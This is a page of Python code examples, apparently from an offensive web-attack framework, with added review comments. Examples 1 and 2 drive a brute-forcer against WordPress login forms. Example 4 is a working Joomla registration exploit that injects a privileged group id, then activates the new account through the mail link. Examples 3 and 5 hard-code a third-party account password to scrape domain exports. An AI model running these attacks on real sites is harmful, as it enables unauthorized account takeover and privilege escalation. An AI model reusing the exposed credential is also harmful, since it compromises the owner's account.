Ejemplo n.º 1
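	def run(self, frmwk, args):
		"""Configure the shared ``attack/web_bruter`` module for a WordPress-style login form and run it.

		The POST template uses the ``log`` / ``pwd`` / ``wp-submit`` / ``testcookie``
		fields of the WordPress login form, with ``__USER__`` and ``__PASS__`` as the
		placeholders the bruter module substitutes. A guess is treated as successful
		when the response contains ``tokenstr`` (CHECKTYPE is ``successstr``).

		Review notes (defensive): on the target this shows up as a burst of POSTs to
		the login URL whose bodies carry ``log=``, ``pwd=`` and ``wp-submit=Log+In``.
		Rate limiting, lockout after repeated failures and a second authentication
		factor are the controls that blunt it.

		Args:
			frmwk: framework object providing ``print_status``, ``modules`` and
				``reload_module``.
			args: unused here.
		"""
		module_name = 'attack/web_bruter'

		frmwk.print_status('Init params!')
		victim = HTTP(self.options['URL'], timeout=self.advanced_options['TIMEOUT'])
		victim.storecookie = True
		checktype = 'successstr'
		# presumably a marker that only appears on the post-login page; confirm
		tokenstr = 'no-unread-messages'

		param = (
			'log=__USER__&pwd=__PASS__&wp-submit=Log+In&redirect_to='
			+ quote_plus(self.options['URL'])
			+ '&testcookie=1'
		)
		frmwk.print_status('Start bruteforcer!')
		bruter = frmwk.modules[module_name]
		try:
			opts = bruter.options
			opts.addString('URL', 'Link login', default=self.options['URL'])
			opts.addString('USERNAME', 'Account login', default=self.options['USERNAME'])
			opts.addString('PASSWORD', 'Password login', default=self.options['PASSWORD'])
			opts.addString('DATA', 'Data with POST method', default=param)
			opts.addString('CHECKTYPE', 'Type of checker success login', default=checktype)
			# NOTE(review): the help text says "Error string" while CHECKTYPE is
			# 'successstr'; left as-is because the bruter module's contract is not visible.
			opts.addString('TOKEN', 'Error string', default=tokenstr)
			# Help texts below were copy-pasted or swapped in the original.
			opts.addInteger('THREADS', 'Number of threads', default=self.options['THREADS'])
			opts.addPath('USERLIST', 'usernames to test', default=self.options['USERLIST'])
			opts.addPath('PASSLIST', 'passwords to test', default=self.options['PASSLIST'])
			opts.addBoolean('VERBOSE', 'Verbose', default=self.options['VERBOSE'])

			adv = bruter.advanced_options
			# NOTE(review): no request is sent through `victim` in this method before
			# its headers are read, so this value depends on what HTTP() sets up on
			# construction; confirm that 'Cookie' is always a present key.
			adv.addString('COOKIE', 'Cookie', default=victim.headers['Cookie'] or None)
			adv.addInteger('DELAY', 'Delay time', default=self.advanced_options['DELAY'])
			adv.addInteger('TIMEOUT', 'Time out request', default=self.advanced_options['TIMEOUT'])
			adv.addBoolean('STOP', 'Stop scanning', default=True)
			bruter.run(frmwk, None)
		finally:
			# The shared module object was mutated above; reload it even when
			# configuration or the run raises, so the overrides do not persist.
			frmwk.reload_module(module_name)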
Ejemplo n.º 2
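    def run(self, frmwk, args):
        """Drive the shared ``attack/web_bruter`` module against a WordPress-style login form.

        The request body template carries the WordPress login fields (``log``,
        ``pwd``, ``wp-submit``, ``testcookie``); ``__USER__`` and ``__PASS__`` are
        the placeholders handed to the bruter module. Success is decided by the
        presence of ``tokenstr`` in the response (CHECKTYPE ``successstr``).

        Review notes (defensive): the resulting traffic is many POSTs to one login
        URL with ``log=`` / ``pwd=`` / ``wp-submit=Log+In`` in the body; throttling,
        failed-login lockout and multi-factor authentication are the relevant
        controls.

        Args:
            frmwk: framework object providing ``print_status``, ``modules`` and
                ``reload_module``.
            args: unused here.
        """
        module_name = 'attack/web_bruter'

        frmwk.print_status('Init params!')
        victim = HTTP(self.options['URL'],
                      timeout=self.advanced_options['TIMEOUT'])
        victim.storecookie = True
        checktype = 'successstr'
        # presumably a marker that only appears on the post-login page; confirm
        tokenstr = 'no-unread-messages'

        param = ''.join((
            'log=__USER__&pwd=__PASS__&wp-submit=Log+In&redirect_to=',
            quote_plus(self.options['URL']),
            '&testcookie=1',
        ))
        frmwk.print_status('Start bruteforcer!')
        bruter = frmwk.modules[module_name]
        try:
            bruter.options.addString(
                'URL', 'Link login', default=self.options['URL'])
            bruter.options.addString(
                'USERNAME', 'Account login', default=self.options['USERNAME'])
            bruter.options.addString(
                'PASSWORD', 'Password login', default=self.options['PASSWORD'])
            bruter.options.addString(
                'DATA', 'Data with POST method', default=param)
            bruter.options.addString(
                'CHECKTYPE', 'Type of checker success login', default=checktype)
            # NOTE(review): help text says "Error string" although CHECKTYPE is
            # 'successstr'; kept because the bruter module's contract is not visible.
            bruter.options.addString('TOKEN', 'Error string', default=tokenstr)
            # The next three help texts were copy-pasted or swapped in the original.
            bruter.options.addInteger(
                'THREADS', 'Number of threads', default=self.options['THREADS'])
            bruter.options.addPath(
                'USERLIST', 'usernames to test', default=self.options['USERLIST'])
            bruter.options.addPath(
                'PASSLIST', 'passwords to test', default=self.options['PASSLIST'])
            bruter.options.addBoolean(
                'VERBOSE', 'Verbose', default=self.options['VERBOSE'])
            # NOTE(review): nothing is requested through `victim` before its
            # headers are read here, so the value depends on what HTTP() sets up
            # on construction; confirm that 'Cookie' is always a present key.
            bruter.advanced_options.addString(
                'COOKIE', 'Cookie', default=victim.headers['Cookie'] or None)
            bruter.advanced_options.addInteger(
                'DELAY', 'Delay time', default=self.advanced_options['DELAY'])
            bruter.advanced_options.addInteger(
                'TIMEOUT',
                'Time out request',
                default=self.advanced_options['TIMEOUT'])
            bruter.advanced_options.addBoolean(
                'STOP', 'Stop scanning', default=True)
            bruter.run(frmwk, None)
        finally:
            # The shared module object was mutated above; always reload it so the
            # overrides do not persist when configuration or the run raises.
            frmwk.reload_module(module_name)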
Ejemplo n.º 3
	def eWhois(self, searcher):
		"""Log in to ewhois.com, fetch its export for ``self.ip`` and append the parsed entries to ``self.domains``.

		Args:
			searcher: mapping whose ``'SITE'`` value is used in the status line.
		"""
		# NOTE(review): the account password is hard-coded in source and the login
		# is posted to a plain http:// URL, so the credential is exposed both in the
		# repository and on the wire. It should come from configuration and use TLS.
		login_body = urlencode({
			'_method': 'POST',
			'data[User][email]': '*****@*****.**',
			'data[User][password]': 'RitX:::R1tX',
			'data[User][remember_me]': '0',
		})
		session = HTTP("http://www.ewhois.com/")
		session.storecookie = True
		session.rand_useragent = False
		# The login response is not inspected; a failed login is only noticed
		# indirectly, through what the export request returns.
		session.Request('http://www.ewhois.com/login/', 'POST', login_body)
		export = session.Request("http://www.ewhois.com/export/ip-address/%s/" % self.ip)
		# NOTE(review): the `|` sits outside any group, so this pattern is a
		# top-level alternation, and `[UA\-[0-9]+` is one character class. It looks
		# like an optional "UA-n-n" field was intended; confirm against real data.
		found = findall(r'"(.*?)","","","[UA\-[0-9]+\-[0-9]+|]",""', export)
		status_line = self.fmt_string.format(searcher['SITE'], len(found))
		self.frmwk.print_status(status_line)
		self.domains += found
Ejemplo n.º 4
	def run(self, frmwk, args):
		"""Register an account through the ``com_users`` registration form at options['URL'] and try to activate it.

		Both POST bodies include ``jform[groups][]=7``, i.e. the client supplies a
		group id during self-registration (7 is presumably a privileged group;
		confirm). Two POSTs are sent on the same cookie session: first a body whose
		two password fields differ, then the real registration. The method then
		waits 30 s, reads messages from ``self.getMail()`` and requests the first
		activation link it finds.

		Review notes (defensive): a registration handler should ignore or reject a
		client-supplied ``jform[groups]`` field. Requests to
		``task=registration.register`` that carry it are a useful log/WAF signal.

		Returns None; outcomes are reported through ``frmwk.print_*``.
		"""
		url 				= self.options['URL']
		email 				= CONFIG.GMAIL_ACCOUNT[0]
		# Random numeric suffix on the account name; the literal parts are masked on this page.
		self.username		= '******' + str(randint(1000,100000))
		self.password 		= '******'
		victim				= HTTP(url)
		# Keep cookies so that every request below shares one session.
		victim.storecookie	= True
		# First body: password1 (123123) and password2 (1231233) differ, so this
		# submission presumably fails validation on purpose ("false request" below).
		exploit				= 'jform%5Bname%5D=exploit&jform%5Busername%5D=exploit&jform%5Bpassword1%5D=123123&jform%5Bpassword2%5D=1231233&jform%5Bemail1%5D=pentest%40yahoo.com&jform%5Bemail2%5D=pentest%40yahoo.com&option=com_users&task=registration.register&jform%5Bgroups%5D%5B%5D=7&'
		# Second body: same fields, filled with the generated username/password and the mailbox address.
		registry			= 'jform%5Bname%5D={0}&jform%5Busername%5D={0}&jform%5Bpassword1%5D={1}&jform%5Bpassword2%5D={1}&jform%5Bemail1%5D={2}&jform%5Bemail2%5D={2}&option=com_users&task=registration.register&jform%5Bgroups%5D%5B%5D=7&'.format(self.username, self.password, email)
		
		frmwk.print_status('Init token')
		data	= victim.Request(url)
		# A 32-character field name with value "1": presumably the form's anti-CSRF token.
		# NOTE(review): '\s' in a non-raw string literal; these patterns should be raw strings.
		token	= search('name="([a-zA-Z0-9]{32})"\svalue="1"', data)
		if token:
			token	= token.group(1)
		else:
			# No token found: the requests below are still sent, with '=1' as the trailing pair.
			token	= ''
		frmwk.print_status('Send false request')
		url	= url + '?task=registration.register'
		victim.Request(url, 'POST', exploit + token + '=1')
		frmwk.print_status('Send exploit request')
		data	= victim.Request(url, 'POST', registry + token + '=1')

		# The outcome is read from the page's message blocks in the second response.
		warning	= search('class="warning\smessage">(.*?)</dd>', data, DOTALL)
		message	= search('class="message\smessage">(.*?)</dd>', data, DOTALL)
		if warning:
			frmwk.print_error('Error during exploit : ' + warning.group(1))
			return
		elif message:
			frmwk.print_success('Successful : ' + message.group(1).strip())
			# The generated credentials are written to the framework output in clear text.
			frmwk.print_success('Account login: %s | %s' % (self.username, self.password))
		else:
			# Neither block matched. The status text is Vietnamese (roughly "hit or miss").
			frmwk.print_status('Hên xui !')
		
		frmwk.print_status('Sleep 30s for mail receiver !')
		sleep(30)
		# NOTE(review): the loop variable reuses the name `email`, shadowing the address read above.
		for email in self.getMail():
			active	= search('(http(.*?)activate&token=(.*?))\s', email['body'], DOTALL)
			if active:
				active_link	= active.group(1)
				frmwk.print_status('Active link: ' + active_link)
				break
		# NOTE(review): `active_link` is bound only when a message matched; if none
		# did (or getMail() yielded nothing) this line raises UnboundLocalError.
		if active_link:
			data	= victim.Request(active_link)
			message	= search('class="message\smessage">(.*?)</dd>', data, DOTALL)
			if message:
				frmwk.print_success('Actived Account: %s | %s' % (self.username, self.password))
Ejemplo n.º 5
 def eWhois(self, searcher):
     """Authenticate to ewhois.com, download the export for ``self.ip`` and add the parsed entries to ``self.domains``.

     Args:
         searcher: mapping whose ``'SITE'`` value is used in the status line.
     """
     # NOTE(review): a hard-coded account password sent to a plain http:// login
     # URL is exposed in source control and on the network. Load it from
     # configuration and use TLS instead.
     form_fields = {
         '_method': 'POST',
         'data[User][email]': '*****@*****.**',
         'data[User][password]': 'RitX:::R1tX',
         'data[User][remember_me]': '0',
     }
     params = urlencode(form_fields)
     client = HTTP("http://www.ewhois.com/")
     client.storecookie = True
     client.rand_useragent = False
     # The login response is discarded; nothing here checks that authentication worked.
     client.Request('http://www.ewhois.com/login/', 'POST', params)
     export_url = "http://www.ewhois.com/export/ip-address/%s/" % self.ip
     body = client.Request(export_url)
     # NOTE(review): `|` is not inside a group here, so the whole pattern is an
     # alternation and `[UA\-[0-9]+` is a single character class. An optional
     # "UA-n-n" column was probably intended; verify against real export data.
     matches = findall(r'"(.*?)","","","[UA\-[0-9]+\-[0-9]+|]",""', body)
     self.frmwk.print_status(
         self.fmt_string.format(searcher['SITE'], len(matches)))
     self.domains += matches